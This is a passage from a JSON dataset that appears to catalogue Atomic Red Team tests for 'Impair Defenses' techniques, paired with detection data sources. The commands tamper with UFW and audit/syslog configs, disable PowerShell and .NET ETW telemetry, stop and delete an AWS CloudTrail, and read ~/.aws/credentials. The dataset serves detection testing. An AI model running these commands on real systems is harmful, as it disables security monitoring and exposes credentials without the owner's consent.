rule on the Uncomplicated Firewall (UFW) if installed and enabled. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ufw is installed on the machine and enabled.\n", + "prereq_command": "if [ ! 
-x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "ufw prepend deny from 1.2.3.4\nufw status numbered\n", + "cleanup_command": "{ echo y; echo response; } | ufw delete 1\nufw status numbered\n" + } + }, + { + "name": "Edit UFW firewall user.rules file", + "auto_generated_guid": "beaf815a-c883-4194-97e9-fdbbb2bbdd7c", + "description": "Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /etc/ufw/user.rules exists.\n", + "prereq_command": "if [ ! -f \"/etc/ufw/user.rules\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/user.rules\ngrep \"# THIS IS A COMMENT\" /etc/ufw/user.rules\n", + "cleanup_command": "sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/user.rules\n" + } + }, + { + "name": "Edit UFW firewall ufw.conf file", + "auto_generated_guid": "c1d8c4eb-88da-4927-ae97-c7c25893803b", + "description": "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf \nwhich controls if the firewall starts on boot and its logging level.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /etc/ufw/ufw.conf exists.\n", + "prereq_command": "if [ ! 
-f \"/etc/ufw/ufw.conf\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/ufw.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/ufw.conf\n", + "cleanup_command": "sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf\ncat /etc/ufw/ufw.conf\n" + } + }, + { + "name": "Edit UFW firewall sysctl.conf file", + "auto_generated_guid": "c4ae0701-88d3-4cd8-8bce-4801ed9f97e4", + "description": "Edit the Uncomplicated Firewall (UFW) configuration file for setting network \nvariables /etc/ufw/sysctl.conf.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /etc/ufw/sysctl.conf exists.\n", + "prereq_command": "if [ ! -f \"/etc/ufw/sysctl.conf\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/sysctl.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/sysctl.conf\n", + "cleanup_command": "sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf\ncat /etc/ufw/sysctl.conf\n" + } + }, + { + "name": "Edit UFW firewall main configuration file", + "auto_generated_guid": "7b697ece-8270-46b5-bbc7-6b9e27081831", + "description": "Edit the Uncomplicated Firewall (UFW) main configuration file for setting \ndefault policies /etc/default/ufw.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /etc/default/ufw exists.\n", + "prereq_command": "if [ ! 
-f \"/etc/default/ufw\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"# THIS IS A COMMENT\" >> /etc/default/ufw\ngrep \"# THIS IS A COMMENT\" /etc/default/ufw\n", + "cleanup_command": "sed -i 's/# THIS IS A COMMENT//g' /etc/default/ufw\n" + } + }, + { + "name": "Tail the UFW firewall log file", + "auto_generated_guid": "419cca0c-fa52-4572-b0d7-bc7c6f388a27", + "description": "Print the last 10 lines of the Uncomplicated Firewall (UFW) log file \n/var/log/ufw.log.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /var/log/ufw.log exists.\n", + "prereq_command": "if [ ! -f \"/var/log/ufw.log\" ]; then echo -e \"\\n***** ufw NOT logging *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "tail /var/log/ufw.log\n", + "cleanup_command": "" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + 
"Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + 
"relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall disable", + "description": "A firewall system was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall 
system was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firewall rule" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ] + ] + }, + { + "technique_id": "T1562.006", + "command_list": [ + "sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/auditd.conf\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a 
#art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf\n", + "if [ -f \"/etc/syslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/rsyslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/syslog-ng.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf\nfi\n", + "cmd /c \"$env:temp\\pstools\\PsExec.exe\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"#{provider}\" -ets", + "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"EventLog-Application\" --p \"#{provider}\" -ets", + "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"Microsoft-Windows-Powershell\" -ets", + "REG ADD HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /t REG_DWORD /d 0", + "New-ItemProperty -Path HKLM:\\Software\\Microsoft\\.NETFramework -Name ETWEnabled -Value 0 -PropertyType \"DWord\" -Force" + ], + "commands": [ + { + "command": "sed -i '$ a 
#art_test_1562_006_1' /etc/audisp/audispd.conf\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/auditd.conf\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "if [ -f \"/etc/syslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' 
/etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/rsyslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/syslog-ng.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf\nfi\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "cmd /c \"$env:temp\\pstools\\PsExec.exe\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"#{provider}\" -ets", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"EventLog-Application\" --p \"#{provider}\" -ets", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"Microsoft-Windows-Powershell\" -ets", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "REG ADD HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /t REG_DWORD /d 0", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": 
"New-ItemProperty -Path HKLM:\\Software\\Microsoft\\.NETFramework -Name ETWEnabled -Value 0 -PropertyType \"DWord\" -Force", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.006", + "display_name": "Impair Defenses: Indicator Blocking", + "atomic_tests": [ + { + "name": "Auditing Configuration Changes on Linux Host", + "auto_generated_guid": "212cfbcf-4770-4980-bc21-303e37abd0e3", + "description": "Emulates modification of auditd configuration files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "audisp_config_file_name": { + "description": "The name of the audispd configuration file to be changed", + "type": "String", + "default": "audispd.conf" + }, + "auditd_config_file_name": { + "description": "The name of the auditd configuration file to be changed", + "type": "String", + "default": "auditd.conf" + }, + "libaudit_config_file_name": { + "description": "The name of the libaudit configuration file to be changed", + "type": "String", + "default": "libaudit.conf" + } + }, + "executor": { + "command": "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "cleanup_command": "sed -i '$ d' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ d' /etc/#{auditd_config_file_name}\nelse sed -i '$ d' /etc/audit/#{auditd_config_file_name}\nfi\nsed -i '$ d' /etc/#{libaudit_config_file_name}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Logging Configuration Changes on Linux Host", + "auto_generated_guid": "7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c", + 
"description": "Emulates modification of syslog configuration.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "syslog_config_file_name": { + "description": "The name of the syslog configuration file to be changed", + "type": "String", + "default": "syslog.conf" + }, + "rsyslog_config_file_name": { + "description": "The name of the rsyslog configuration file to be changed", + "type": "String", + "default": "rsyslog.conf" + }, + "syslog_ng_config_file_name": { + "description": "The name of the syslog-ng configuration file to be changed", + "type": "String", + "default": "syslog-ng.conf" + } + }, + "executor": { + "command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "cleanup_command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ d' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ d' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Disable Powershell ETW Provider - Windows", + "auto_generated_guid": "6f118276-121d-4c09-bb58-a8fb4a72ee84", + "description": "This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. 
This provider is used as a common source of telemetry in AV/EDR solutions.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ps_exec_location": { + "description": "Location of PSExec.", + "type": "string", + "default": "$env:temp\\pstools\\PsExec.exe" + }, + "session": { + "description": "The session to disable.", + "type": "string", + "default": "EventLog-Application" + }, + "provider": { + "description": "The provider to disable.", + "type": "string", + "default": "Microsoft-Windows-Powershell" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PSExec must be installed on the machine.", + "prereq_command": "if (Test-Path \"#{ps_exec_location}\") {exit 0} else {exit 1}", + "get_prereq_command": "start-bitstransfer -source \"https://download.sysinternals.com/files/PSTools.zip\" -destination \"$env:temp\\PStools.zip\"\nexpand-archive -literalpath \"$env:temp\\PStools.zip\" -destinationpath \"$env:temp\\pstools\" -force" + } + ], + "executor": { + "command": "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"#{provider}\" -ets", + "cleanup_command": "cmd /c \"#{ps_exec_location}\" -i -s cmd.exe /c logman update trace \"#{session}\" -p \"#{provider}\" -ets", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Disable .NET Event Tracing for Windows Via Registry (cmd)", + "auto_generated_guid": "8a4c33be-a0d3-434a-bee6-315405edbd5b", + "description": "Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "REG ADD HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /t REG_DWORD /d 0", + "cleanup_command": "REG DELETE HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /f > nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Disable .NET Event Tracing for Windows Via Registry 
(powershell)", + "auto_generated_guid": "19c07a45-452d-4620-90ed-4c34fffbe758", + "description": "Disables ETW for the .NET Framework using PowerShell to update the Windows registry", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "New-ItemProperty -Path HKLM:\\Software\\Microsoft\\.NETFramework -Name ETWEnabled -Value 0 -PropertyType \"DWord\" -Force", + "cleanup_command": "REG DELETE HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /f > $null 2>&1", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", 
+ "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + 
"target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + null, + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1562.008", + "command_list": [ + "aws cloudtrail create-trail --name redatomictesttrail --s3-bucket-name #{s3_bucket_name} --region #{region}\naws cloudtrail update-trail --name redatomictesttrail --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name redatomictesttrail --region #{region}\naws cloudtrail delete-trail --name redatomictesttrail --region #{region}\n", + "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name redatomic-test --region #{region}\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name redatomic-test --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}\naws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}\n", + "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region us-east-1\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region us-east-1\naws cloudtrail stop-logging --name #{cloudtrail_name} --region us-east-1\naws cloudtrail delete-trail --name #{cloudtrail_name} --region us-east-1\n", + null, + "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-AzureAD -Credential $creds\nNew-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name test_eventhub\nRemove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name test_eventhub\n" + ], + "commands": [ + { + 
"command": "aws cloudtrail create-trail --name redatomictesttrail --s3-bucket-name #{s3_bucket_name} --region #{region}\naws cloudtrail update-trail --name redatomictesttrail --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name redatomictesttrail --region #{region}\naws cloudtrail delete-trail --name redatomictesttrail --region #{region}\n", + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + }, + { + "command": "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name redatomic-test --region #{region}\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name redatomic-test --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}\naws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}\n", + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + }, + { + "command": "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region us-east-1\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region us-east-1\naws cloudtrail stop-logging --name #{cloudtrail_name} --region us-east-1\naws cloudtrail delete-trail --name #{cloudtrail_name} --region us-east-1\n", + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + }, + { + "command": null, + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + }, + { + "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-AzureAD -Credential $creds\nNew-AzEventHub 
-ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name test_eventhub\nRemove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name test_eventhub\n", + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.008", + "display_name": "Impair Defenses: Disable Cloud Logs", + "atomic_tests": [ + { + "name": "AWS CloudTrail Changes", + "auto_generated_guid": "9c10dc6b-20bd-403a-8e67-50ef7d07ed4e", + "description": "Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail\n", + "supported_platforms": [ + "iaas:aws" + ], + "input_arguments": { + "cloudtrail_name": { + "description": "Name of the cloudTrail", + "type": "String", + "default": "redatomictesttrail" + }, + "s3_bucket_name": { + "description": "Name of the bucket", + "type": "String", + "default": "redatomic-test" + }, + "region": { + "description": "Name of the region", + "type": "String", + "default": "us-east-1" + } + }, + "dependencies": [ + { + "description": "Check if ~/.aws/credentials file has a default stanza is configured\n", + "prereq_command": "cat ~/.aws/credentials | grep \"default\"\naws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}\naws s3api put-bucket-policy 